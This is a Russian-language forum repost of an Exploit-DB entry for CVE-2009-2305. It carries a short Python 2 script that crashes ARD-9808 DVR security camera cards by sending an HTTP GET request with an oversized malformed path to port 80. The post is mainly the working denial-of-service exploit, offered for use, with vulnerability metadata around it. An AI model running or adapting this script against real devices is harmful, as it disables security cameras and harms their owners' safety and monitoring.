Exploit ARD-9808 DVR Card Security Camera - GET Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9067
Проверка EDB
  1. Пройдено
Автор
STACK
Тип уязвимости
DOS
Платформа
HARDWARE
CVE
cve-2009-2305
Дата публикации
2009-07-01
Код:
import socket
import sys
print "----------------------------------------------------------------"
print " ARD-9808 DVR Card Security Camera <= Remote Denial Of Service  "
print " author: Stack                                                  "
print "----------------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
       buff = "//.\\" * 1000
       request =  "GET " + buff + " HTTP/1.0"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       raw_input('\n\nExploit completed. Press "Enter" to quit...')
       sys.exit
except:
       raw_input('\n\nUnable to connect. Press "Enter" to quit...')

# milw0rm.com [2009-07-01]
 
Источник
www.exploit-db.com

Похожие темы